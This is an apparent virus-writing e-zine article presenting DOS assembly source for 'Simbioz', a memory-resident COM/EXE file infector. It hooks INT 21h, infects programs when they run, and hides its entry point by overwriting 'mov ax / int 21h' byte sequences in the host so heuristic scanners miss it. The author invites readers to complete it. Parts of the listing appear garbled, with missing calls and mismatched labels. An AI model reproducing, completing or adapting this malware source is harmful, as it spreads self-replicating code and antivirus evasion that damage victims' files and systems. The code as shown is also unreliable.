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SLAM2.033: The Anti-heuristic Virus Simbioz by Death Knight [SLAM]

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Published in 
 · 23 Feb 2022

Simbiot virus. Written special for SLAM issue#2.
It's not completed virus, it's only foundation for real good virus.

Oneday i was reading virus-list of one russian antivirus, and there i found description of one interesting virus. Long time I search this virus, and when Night Joker connected with me firsts onces i decided to write the virus with 'Simbiotic' algorithm of infection.

All parts of this virus is mostly standartized and there are nothing interesting for real virusmakers but the virus has one interesting part. This part is remarked in detail.

Every virus sets jumping to own body at the firsts bytes of the infecting file and it helps to all heuristic analisators found the virus in the file.
But these jumps we can mask!
Almost every program have commands like this:

B8???? mov ax,numbers 
CD21 int 21h

If we'll be find these bytes and change them to call to body of the virus, and if we'll extract back-address from the stack (not need to save address in the virus's body) antivirus would have never seek it.
I was realised this algorithm for COM files...
If anybody want to complete this, o.k., go on! :)

Death Knight [SLAM]

.model tiny 

length equ finish-main
memory equ (length+17)/8 ;length (in paragraphs+1)*2
off1 equ (4*21h)
off2 equ (4*21h+2)

int21 macro
call int21h

org 0
main: call $+3
pop si
sub si,3
push ax bx cx dx si di ds es
mov ax,0ACCEh
int 21h
cmp ax,1997h
jz already
mov ax,ds
dec ax
mov ds,ax
mov ah,ds:[0]
cmp ah,'Z'
jne already
xor di,di
mov cx,length
mov ax,ds:[3]
sub ax,memory
mov ds:[3],ax
mov ax,ds:[12h]
sub ax,memory
mov ds:[12h],ax
mov es,ax
push cs
pop ds
xor ax,ax
mov ds,ax
mov ax,ds:[off1]
mov si,offset handl
mov es:[si],ax
mov ax,ds:[off2]
mov es:[si+2],ax
mov si,offset newint
mov ds:[off1],si
mov ds:[off2],es
pop es ds di si dx cx bx ax
add si,offset blocks
cmp word ptr cs:[si],'ZM'
jz exesh
pop di
push di
exesh: mov dx,ds
add dx,10h
mov cx,dx
add cx,word ptr cs:[si+0eh]
mov ss,cx
mov sp,word ptr cs:[si+10h]
add dx,word ptr cs:[si+16h]
push dx
push word ptr cs:[si+14h]

int21h: pushf
call dword ptr cs:[handl]
db '>SimbioT<'
go_int: db 0eah
handl: dd ?
newint: cmp ax,0ACCEh
jnz nes1
mov ax,1997h
cmp ax,4b00h
jz hahaha
jmp go_int
db '>[SLAM]<'
push ax bx cx dx si di es ds
call infec
pop ds es di si dx cx bx ax
jmp go_int

infec: push cs
pop es
push si
mov bx,offset no_inf
mov di,9 ;number=no_inf-1
ggg1: mov cx,8
ggg2: push di cx
add di,bx
mov si,cx
add si,dx
mov ax,word ptr es:[di]
cmp ax,word ptr ds:[si]
pop cx di
jz ennn
cmp al,'.'
jz ennn
loop ggg2
dec di
cmp di,0
jnz ggg1
pop si
jmp okk
ennn: pop si
alread2:jmp alread
okk: mov ax,ds
mov word ptr cs:[attrib1+1],ax ;save filename
mov word ptr cs:[attrib2+1],dx ;address
mov ax,4300h
mov word ptr cs:[attrib3+1],cx ;save attributes
xor cx,cx ;set attributes
mov ax,4301h

openn: mov ax,3D02h ;open a file
mov bx,ax ;copy handler to BX
push cs
pop ds
mov ax,5700h ;get file time & date
mov word ptr ds:[time1+1],dx ;save date
mov word ptr ds:[time2+1],cx ;save time
call check ;call infection check
jz alread2
call comexe ;call com or exe check
jz exec

cmp word ptr cs:[lengg1],61000 ;check higer border of com file
mov byte ptr cs:[offset coex],2
jnc alread2

call com_in
cmp byte ptr cs:[chh],0
jz alread2

jmp nez
exec: mov ax,word ptr cs:[offset lengg1]
mov dx,word ptr cs:[offset lengg2]
mov byte ptr cs:[offset coex],1

push ax dx
mov cx,200h
div cx
inc ax
mov di,offset blocks
cmp ax,[di+4]
jnz aganx
cmp dx,[di+2]
aganx: pop dx ax
jnz alread3
jmp nez
alread3:jmp alread2

nez: mov ax,4202h
xor cx,cx
xor dx,dx
push cs ;
mov ah,40h ;saving
xor dx,dx ; virus
mov cx,length ; block
pop ds ;
int21 ;

cmp byte ptr cs:[offset coex],2
jz comme
mov ax,word ptr cs:[offset lengg1]
mov dx,word ptr cs:[offset lengg2]
push ax dx
add ax,length
adc dx,0
mov cx,200h
div cx
inc ax
mov word ptr cs:[di+4],ax
mov word ptr cs:[di+2],dx
pop dx ax
push si
mov si,[di+8]
mov cl,4
shl si,cl
sub ax,si
pop si
sbb dx,0
mov cx,10h
div cx
mov word ptr cs:[di+22],ax
mov word ptr cs:[di+20],dx
mov word ptr cs:[di+14],ax
jmp nes2a
comme: jmp alread
mov ax,word ptr cs:[offset lengg1]
mov byte ptr cs:[offset blocks],0E9h
sub ax,3
mov word ptr cs:[offset blocks+1],ax

nes2a: mov ax,4200h
xor cx,cx
xor dx,dx
push cs
pop ds
mov ah,40h
mov cx,18h+2
mov dx,offset blocks

alread: mov ax,5701h ;set saved
time1: mov dx,0 ;date &
time2: mov cx,0 ;time
dec cx
mov ah,3Eh ;file closing
mov ax,4301h
attrib1:mov dx,0 ;
mov ds,dx
attrib2:mov dx,0
attrib3:mov cx,0
no_no: ret

check: mov ax,4202h
push ax
xor cx,cx
xor dx,dx
mov word ptr cs:[lengg1],ax
mov word ptr cs:[lengg2],dx
cmp ax,2048 ;check lower border of any type file
mov cx,dx
mov dx,ax
pop ax
jnc trrr
mov al,55
jmp laaa
trrr: sub dx,2
sub al,2
push cs
pop ds
mov dx,offset blocks
mov cx,2
mov ah,3Fh
mov ax,word ptr ds:[blocks]
add al,ah
laaa: cmp al,55

comexe: xor cx,cx
xor dx,dx
mov ax,4200h
push cs
pop ds
mov dx,offset blocks
mov ah,3Fh
mov cx,18h+3
cmp word ptr cs:[blocks],'ZM'

com_in: push di si ;Here's begin cool routine
mov byte ptr cs:[chh],0 ;simbiotic checker to 0
xor dx,dx ;position to the
mov ax,4200h ;start of the file
xor cx,cx ;
int21 ;
mov di,0-200h ;initial of block's counter
push cs cs ;
pop ds es ;
label1: add di,200h ;adding read block
mov word ptr cs:[offset itsall2+1],di ;saving it in seek pointer
mov dx,offset sbm ;buffer for reading
push dx ;save address of this buffer
mov ah,3Fh ;reading
mov cx,200h ;200h bytes from
int21 ;infecting file
pop si ;remind buffer from the stack
push ax ;save deal of readen bytes
sub ax,6 ;
add si,3 ;
push ax ;this is number of loops
pop cx ;for finding
labb1: cmp word ptr cs:[si],21cdH ;it find 'int 21h' instruction
jnz labb2 ;in readden block
cmp byte ptr ds:[si-3],0B8h ;it see for instruction 'mov ax,????'
jz itsall ;if found - go to infection
cmp byte ptr ds:[si-2],0B4h ;it see for instruction 'mov ah,??'
jz itsall ;if found - go to infection
labb2: inc si ;
loop labb1 ;
pop ax ;remind deal of readen bytes
cmp ax,200h ;
jz label1 ;if not 200h then
pop si di ;return without
ret ;infection :(

itsall: pushf ;
push ax ;
itsall2:mov dx,0 ;sets pointer to the start
xor cx,cx ;of the found block
mov ax,4200h ;
int21 ;
mov dx,ax ;calculating
mov ax,word ptr cs:[lengg1] ;call-address
sub ax,dx ;
pop dx ;
sub ax,dx ;
sub ax,6 ;
mov dx,word ptr cs:[si] ;saving
mov word ptr cs:[offset blocks],dx ;four
mov dx,word ptr cs:[si+2] ;original
mov word ptr cs:[offset blocks+2],dx ;bytes
mov byte ptr cs:[si],'Ë' ;setting
mov word ptr cs:[si+1],ax ;'Call'command
popf ;
pop cx ;saving
mov ax,4000h ;infected
mov dx,offset sbm ;block
push cs ;to the
pop ds ;file
int21 ;
pop si di ;
mov byte ptr cs:[chh],1 ;o.k. i did it!
ret ;

blocks: db 0cdh,21h
db 90h
db 18h dup(?)
no_inf db 'INCOAIWEWI'
db 55
db 0
coex: db ?
lengg1: dw ?
lengg2: dw ?
ogy: db ?
numm: dw ?
chh: db ?
sbm: dw ?
end start

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